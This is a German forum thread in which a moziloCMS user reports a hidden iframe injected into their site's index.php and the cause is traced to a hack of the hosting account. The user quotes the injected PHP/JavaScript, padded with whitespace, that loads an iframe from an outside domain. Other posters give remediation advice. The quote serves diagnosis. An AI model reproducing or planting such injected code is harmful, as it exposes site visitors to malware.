Unbekanntes Iframe

[hejberlin]

Auf einer meiner Seiten, die ich mit mozilo erstellt habe, erscheint immer wieder ein seltsames ok-Feld, auch im backend und dann lässt sich nichts mehr anklicken.
Ich habe es mit firebug untersucht und scheinbar befindet sich da ein Iframe, das ich da aber nicht eingebunden habe, zumal ich die Seite nur noch als Informationsseite nutze, da sie demnächst geschlossen wird. Das einzige, was ich eingebunden habe, sind Social-Media-Buttons von Addthis. Die nutze ich aber woanders auch problemlos.
Ich habe alles vom Server gelöscht und nochmal neu hochgeladen, aber nach ein paar Tagen ist das ok-Feld wieder da.
Da ich aber mozilo auch sonst nutze, interessiert mich schon, wie das immer wieder da hin kommt, denn die im Iframe angegebene Webadresse ist mir vollkommen unbekannt.

[hejberlin]

In der index.php steht folgendes ganz unten. Das ist in der Original-index.php, die ich auf dem Computer gespeichert habe, nicht vorhanden und ich frage mich schon, wie kommt es dahin. Ich hatte erst am Wochenende das gesamte mozilo-Paket neu hochgeladen.

<?
#68c8c7#
                                                                                                                                                                                                                                                          echo "                                                                                                                                                                                                                                                          <script type="text/javascript" language="javascript" >                                                                                                                                                                                                                                                          (function () {    var id = '60';    var arwkp09 = document.createElement('iframe');    arwkp09.src = 'http://fraukesart.de/cnt.php';    arwkp09.style.position = 'absolute';    arwkp09.style.border = '1';    arwkp09.style.height = '31px';    arwkp09.style.width = '42px';    arwkp09.style.left = '500px';    arwkp09.style.top = '100px';    if (!document.getElementById('arwkp')) {        document.write('<style>body{overflow-x:hidden;}</style>');        document.write('<div id='arwkp' style="position:absolute; width:80%; height:100%;" ></div>');        document.getElementById('arwkp').appendChild(arwkp09);    }})();</script>";

#/68c8c7#
?>

[stefanbe]

ist das gleiche wie da http://www.mozilo.de/forum/index.php/topic,3321.msg15927.html

sieht aber eher nach ein problem beim provider aus.

frag den mal ob er da was rauskriegen kann.

lg stefanbe

[hejberlin]

Danke für die schnelle Antwort.
Tatsächlich gab es am Wochenende Server-Probleme und die Seite war einige Zeit nicht erreichbar. Ich werde also erstmal die Passwörter ändern und Kontakt mit dem Provider aufnehmen.
Auf einer anderen Seite (gleicher Provider) erscheint nämlich in der index.php auch schon unten javascript. Habs jetzt repariert, aber das ist ja nicht lustig, wenn es immer wieder vorkommt.

[wasp]

Sind tatsächlich 1&1 - Server betroffen ... 

[stefanbe]

die .htaccess wird auch befallen also im ftp program verstägte datein sichtbar machen und auch löschen ersetzen.

is nich nur 1&1

lg stefanbe

[wasp]

via JS nen php-Aufruf im IFrame ... hat mich überfordert ...

ALSO NACH WIE VOR (!?) JAVA (nicht Javascript) in allen verwendeten BROWSERN ABSCHSCHALTEN!

[hejberlin]

Meine Seiten liegen bei One.com. Eine dritte, die ich aber mit Magix Webdesigner erstellt habe, ist nicht angegriffen worden.

[wasp]

UNBEDINGT: -Dein- System intensiv (professionell?) reinigen lassen - Du hast sicherlich einen Trojaner, welcher ggf. sogar einen Keylogger installiert hat, auf Deinem System 

Arbeite / Lass hier nicht mit einfachen Mitteln arbeiten - Häufig sind Rootkits mit auf der Partition der Festplatte - Alle Eingaben werden protokolliert und dann verschickt. Im eigenen Interesse : Daten sichern und RICHTIG plattmachen (lassen).
Erst dann ALLE PWs (incl. z.B. E-Mail,Homebanking,ebay,mozilo,etc.) NEU vergeben. 

[hejberlin]

Ich habe Anfang Januar gerade alles neu aufgesetzt. Seitdem benutze ich die Kaufversion von AVAST, die jegliche Bedrohung sofort meldet und surfe als normaler Benutzer (nicht Administrator) nur noch in Sandboxie, so dass auf meinem System alles clean ist. Und wie bereits geschrieben, die Dateien auf meinem Computer sind sauber, gerade nochmal mit AVAST geprüft und auch die Seiten jetzt auch wieder, geprüft mit Seitenreport.

So habe ich sie vor einigen Tagen hochgeladen und nur wenige Tage später befanden sich scripts drauf (bzw. nun nicht mehr, weil ich inzwischen mein sauberes mozilo wieder hochgeladen habe). Entweder ist also jemand über ftp oder über mozilo-Admin da rangekommen.

Ich betreibe noch 2 weitere Seiten: eine erstellt mit Magix Webdesigner, eine mit Photostore und beide haben das Problem nicht, die mit dem Webdesigner gemachte liegt auch bei One.com, die andere bei einem anderen Provider.
One.com habe ich benachrichtigt und warte nun auf Antwort. Aber vielleicht gibt es eben doch eine Schwachstelle bei mozilo oder den Plugins?

[Thorstn]

Meine Seiten liegen bei One.com. Eine dritte, die ich aber mit Magix Webdesigner erstellt habe, ist nicht angegriffen worden.

Heißt jetzt WAS genau? Liegt diese Seite auf demselben Webspace / Server des Providers (one dot com)?

Wenn Du Shared-Hosting hast, dann besteht immer die Gefahr, dass Deine Seiten kompromitiert werden, wenn eine andere Präsenz auf dem Server ( also alle möglichen Präsenzen auf dem Server ) sich was gefangen hat.
Blöderweise gibt es immer irgendwelche Idioten, die mit ihren Shared-Hosting Webspaces Schabernack treiben, sei es, weil sie dumm, arrogant oder beides (und somit erschossen gehören) sind.

Bitte beachte: Es geht nicht um Deine Seiten bei einem HOSTER, sondern um die Seiten, die auf EINEM Server liegen.
(Beispiel: Ich habe mehrere Webpakete beim Hoster celeros.de. Aber die einzelnen Pakete sind auf verschiedenen Servern stationiert. Ich hatte mal ein ähnliches Problem wie Du auf einem der Server. Grund war ein Idiot, der komische Skripte auf seiner Homepage laufen hatte, die dann als Einfallstor für Sicherheitslücken missbraucht wurden).

Kurz und gut: Wende Dich an one.com --> Es liegt an irgendwelchen Skripten auf dem Server (hochprozentig von anderen Kunden), aber defintiv NICHT an Deiner moziloCMS!

Gruß aus Bochum,
Thorsten

[hejberlin]

Erstmal noch mal an alle vielen Dank für Eure Antworten.

@Thorstn: Ich habe leider keine Ahnung, ob die Seiten auf verschiedenen Servern liegen. Auf alle Fälle liegen sie nicht auf demselben Webspace, denn ich habe zu unterschiedlichen Seiten Webspace immer nur für eine Seite gemietet.
Auf Antwort von one.com warte ich noch, aber ich bin mit einigen Funktionen sowieso nicht zufrieden und wollte zwar eine Seite dort weiterlaufen lassen, aber das werde ich dann wohl nicht.

@Wasp: Auch Hitmanpro findet keine Bedrohung auf meinem Computer. Das ist es also eindeutig nicht.

[Thorstn]

Ich kenne one.com nur vom Hören-Sagen, ich hatte da nie eine Domain oder einen Webspace.

Ich will aber one.com jetzt nicht verdammen, denn das was jetzt passiert ist, kann auch 1und1, Strato, T-Online oder wem auch immer passieren. Ein Ding ist immer nur so stark wie das schwächste Glied. Und dieser Pimmel sind eben dämliche Kunden (wobei ich mich häufig frage, wieso die Hoster da nicht rigoroser gegen vorgehen bzw. Sicherheitsvorkehrungen treffen  - Stichwort Skripte).

Hoffentlich meldet sich one.com zeitnah bei Dir und hilft. Manche Hoster schieben das gerne auf jeden (!) einzelnen Kunden, ohne das zu recherchieren... ist wie mit den Windmühlen kämpfen...

Naja... 

Falls Du trotz allem nicht zufrieden sein solltest mit dem Hoster... moziloCMS ist auf udmedia.de gehostet... (nur mal so als Hinweis) 

Viel Erfolg!

Alles Liebe aus Bochum,
Thorsten

[hejberlin]

@Thorstn: Nochmal vielen Dank. Ich werde mir das mal ansehen. Wie ich schon schrieb, bin ich sowieso am Überlegen zu wechseln. 2 Seiten können inzwischen auch ganz weg. Ich hatte nämlich das Problem, dass ich bei One.com die Software für meinen Bildshop nicht installieren konnte, weil nicht alle Voraussetzungen erfüllt waren, so dass ich mit einer Seite ja schon umgezogen bin und die noch bestehende nur noch Platzhalter ist. Kann also irgendwann weg. Und an einer bin ich noch stark am Basteln, so dass da ein Umzug auch nicht so schädlich und schwierig wäre - mit mozilo ja sowieso nicht. Alles ist ja schnell woanders hochgeladen.

Gute Nacht 

[hejberlin]

Inzwischen hat sich das Problem gelöst und Mozilo war nicht schuld, sondern es hatte sich tatsächlich jemand auf meine Seite gehackt.
Ich habe am Freitag Mozilo völlig neu und sauber hochgeladen und am Sonnabend war das dubiose script wieder da, obwohl ich alle Passworte geändert hatte und mir Mozilo neu runtergeladen hatte. An Dateien hatte ich bisher nur einige ganz einfache Textdateien und Bilder, die ich selbst prüfen konnte.
One.com untersuchte das daraufhin und bestätigte mir den Hackerangriff. Ich bin nun mit dieser Seite umgezogen.
Ach so, ich hätte mir so übrigens auf meiner eigenen Seite Malware zuziehen können, wenn die nicht durch Sandboxie und AVAST blockiert worden wäre.

Nochmal vielen Dank für Eure Antworten!